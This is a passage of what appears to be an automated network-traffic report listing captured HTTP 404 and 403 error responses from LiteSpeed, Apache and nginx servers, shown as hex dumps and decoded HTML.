3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Dec 2024 21:04:16 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Dec 2024 21:04:19 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Dec 2024 21:04:22 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 21:04:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 21:04:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 21:04:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Dec 2024 21:04:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 16 Dec 2024 21:05:38 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 16 Dec 2024 21:05:41 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
